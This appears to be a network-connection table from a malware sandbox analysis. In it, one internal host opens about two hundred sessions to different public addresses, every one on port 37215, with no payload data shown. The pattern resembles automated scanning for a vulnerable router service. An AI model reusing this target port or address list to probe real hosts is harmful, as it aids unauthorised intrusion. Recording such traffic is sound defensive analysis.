                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24590192.168.2.153892241.187.161.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24591192.168.2.154527641.165.205.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24592192.168.2.155076241.231.192.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24593192.168.2.154529441.77.82.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24594192.168.2.155128041.66.59.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24595192.168.2.1535116156.142.34.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24596192.168.2.1545548156.181.15.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24597192.168.2.1551882156.83.198.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24598192.168.2.1539592156.171.132.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24599192.168.2.1533116156.218.238.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24600192.168.2.1552538156.108.139.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24601192.168.2.1559808156.147.31.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24602192.168.2.1557502156.249.215.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24603192.168.2.1555878156.28.25.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24604192.168.2.1541910156.120.96.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24605192.168.2.1537958156.226.13.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24606192.168.2.1556326156.38.124.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24607192.168.2.1554700156.95.225.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24608192.168.2.1532922156.145.150.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24609192.168.2.1540136156.97.139.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24610192.168.2.1539892156.153.30.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24611192.168.2.1542320156.228.188.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24612192.168.2.1537020156.175.95.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24613192.168.2.1535416156.132.86.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24614192.168.2.1555794156.46.222.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24615192.168.2.1535126156.147.7.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24616192.168.2.1533178156.61.176.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24617192.168.2.1544052156.49.242.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24618192.168.2.1546966156.32.154.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24619192.168.2.1537666156.137.186.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24620192.168.2.1548652156.121.128.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24621192.168.2.1554448156.182.236.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24622192.168.2.1542476156.221.70.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24623192.168.2.1536998156.166.90.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24624192.168.2.1541284156.197.202.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24625192.168.2.1542182156.246.93.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24626192.168.2.1534942156.121.129.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24627192.168.2.1552242156.56.234.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24628192.168.2.1538526156.122.217.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24629192.168.2.1556256156.107.243.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24630192.168.2.1556312156.147.46.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24631192.168.2.1535604156.78.177.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24632192.168.2.1557692156.60.111.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24633192.168.2.1537970156.157.143.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24634192.168.2.1534094156.149.92.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24635192.168.2.1559838156.228.226.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24636192.168.2.1560428156.65.228.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24637192.168.2.1556028156.146.94.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24638192.168.2.1560084156.162.17.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24639192.168.2.1533598156.239.108.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24640192.168.2.1557720156.49.206.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24641192.168.2.1540804156.202.122.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24642192.168.2.1553530156.32.118.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24643192.168.2.1543188156.161.253.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24644192.168.2.1543620156.7.198.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24645192.168.2.1559146156.183.65.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24646192.168.2.1538776156.244.138.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24647192.168.2.1546296156.80.122.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24648192.168.2.1547370156.32.83.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24649192.168.2.1542420156.149.183.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24650192.168.2.1560698156.164.221.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24651192.168.2.1548170156.212.56.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24652192.168.2.1559740156.165.146.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24653192.168.2.1541186156.170.174.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24654192.168.2.1549504156.102.42.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24655192.168.2.1555386156.244.115.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24656192.168.2.1535714156.88.113.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24657192.168.2.1556174156.128.52.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24658192.168.2.1539836156.64.126.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24659192.168.2.1557112156.52.113.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24660192.168.2.1534196156.168.178.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24661192.168.2.1558082156.63.17.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24662192.168.2.1546236156.51.224.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24663192.168.2.1552304156.11.214.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24664192.168.2.1538182156.123.153.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24665192.168.2.1538598156.243.7.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24666192.168.2.1549076156.31.208.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24667192.168.2.1547858156.188.64.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24668192.168.2.1556486156.245.217.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24669192.168.2.1539844156.154.49.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24670192.168.2.1540930156.174.248.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24671192.168.2.1547832156.246.222.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24672192.168.2.1536972156.200.77.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24673192.168.2.1550252156.254.128.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24674192.168.2.1559798156.178.132.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24675192.168.2.1543534156.174.18.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24676192.168.2.1539078156.185.37.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24677192.168.2.1537356156.163.140.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24678192.168.2.1556884156.23.240.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24679192.168.2.1533314156.105.173.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24680192.168.2.1560514156.69.115.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24681192.168.2.1546364156.31.25.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24682192.168.2.1533734156.168.208.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24683192.168.2.1542590156.77.89.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24684192.168.2.1547940156.210.160.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24685192.168.2.1538056156.59.72.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24686192.168.2.1560404156.77.67.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24687192.168.2.1547680156.197.41.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24688192.168.2.1558934156.77.198.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24689192.168.2.1547298156.101.152.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24690192.168.2.1541628156.220.227.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24691192.168.2.1533280156.88.147.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24692192.168.2.1539372156.78.171.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24693192.168.2.1560160156.90.209.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24694192.168.2.1537362156.51.3.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24695192.168.2.1550686156.189.148.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24696192.168.2.1533658156.221.39.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24697192.168.2.1533998156.39.225.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24698192.168.2.1554568156.56.182.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24699192.168.2.1542586156.68.100.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24700192.168.2.1560074156.208.186.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24701192.168.2.1543952156.229.91.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24702192.168.2.1548484156.203.225.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24703192.168.2.1560044156.24.178.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24704192.168.2.1559318156.89.35.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24705192.168.2.1553960156.136.107.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24706192.168.2.1556992156.88.219.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24707192.168.2.1549134156.116.34.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24708192.168.2.1543926156.188.187.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24709192.168.2.1541766156.177.35.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24710192.168.2.1559206156.96.65.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24711192.168.2.1553816156.140.55.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24712192.168.2.1551506156.84.122.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24713192.168.2.1556254156.41.79.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24714192.168.2.1551648156.50.230.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24715192.168.2.1545278156.180.155.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24716192.168.2.1548638156.114.122.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24717192.168.2.1535920156.176.233.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24718192.168.2.1560174156.232.136.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24719192.168.2.1540664156.122.198.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24720192.168.2.1554148156.180.156.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24721192.168.2.1539476156.106.91.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24722192.168.2.1535370156.19.89.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24723192.168.2.1553310156.189.142.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24724192.168.2.1541404156.22.177.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24725192.168.2.1537440156.138.25.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24726192.168.2.1546398156.44.149.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24727192.168.2.1534818156.130.123.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24728192.168.2.1560036156.47.64.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24729192.168.2.1533668156.247.118.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24730192.168.2.1556802156.211.165.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24731192.168.2.1544390156.60.79.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24732192.168.2.1540246156.155.45.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24733192.168.2.1558792156.210.248.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24734192.168.2.1540914156.157.234.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24735192.168.2.1548234156.173.116.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24736192.168.2.1557542156.217.161.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24737192.168.2.1538904156.230.103.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24738192.168.2.1532964156.89.243.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24739192.168.2.1546166156.62.37.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24740192.168.2.1554022156.204.51.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24741192.168.2.1549440156.22.27.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24742192.168.2.1536288156.77.109.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24743192.168.2.1553666156.45.243.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24744192.168.2.1557228156.171.169.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24745192.168.2.1541232156.13.168.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24746192.168.2.1547806156.75.201.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24747192.168.2.1539724156.168.211.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24748192.168.2.1549628156.231.81.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24749192.168.2.1551328156.56.31.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24750192.168.2.1556084156.165.153.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24751192.168.2.1556594156.78.106.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24752192.168.2.1560304156.27.228.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24753192.168.2.1557708156.81.179.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24754192.168.2.1549584156.183.39.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24755192.168.2.1541914156.122.139.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24756192.168.2.1540550156.13.105.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24757192.168.2.1553132156.141.145.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24758192.168.2.1545160156.94.11.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24759192.168.2.1551724156.72.192.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24760192.168.2.1555836156.37.92.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24761192.168.2.1539502156.148.111.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24762192.168.2.1548224156.148.107.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24763192.168.2.1539908156.72.151.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24764192.168.2.1560350156.253.232.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24765192.168.2.1538080156.208.38.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24766192.168.2.1556934156.234.215.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24767192.168.2.1559618156.63.221.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24768192.168.2.1551572156.234.11.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24769192.168.2.1540454156.44.248.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24770192.168.2.1544544156.70.36.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24771192.168.2.1535434156.158.188.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24772192.168.2.1534450156.110.97.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24773192.168.2.1539358156.6.221.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24774192.168.2.1556786156.148.239.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24775192.168.2.1556060156.18.158.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24776192.168.2.1552274156.230.60.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24777192.168.2.1556818156.127.109.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24778192.168.2.1538588156.164.69.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24779192.168.2.1535092156.231.126.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24780192.168.2.1553510156.185.72.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24781192.168.2.1559090156.177.137.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24782192.168.2.1538042156.176.83.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24783192.168.2.1542184156.47.15.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24784192.168.2.1533788156.95.23.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24785192.168.2.1538666156.108.166.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24786192.168.2.1542246156.98.52.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24787192.168.2.1557760156.230.13.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24788192.168.2.1536848156.187.101.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24789192.168.2.1546646156.229.1.20037215
                                                                            TimestampBytes transferredDirectionData


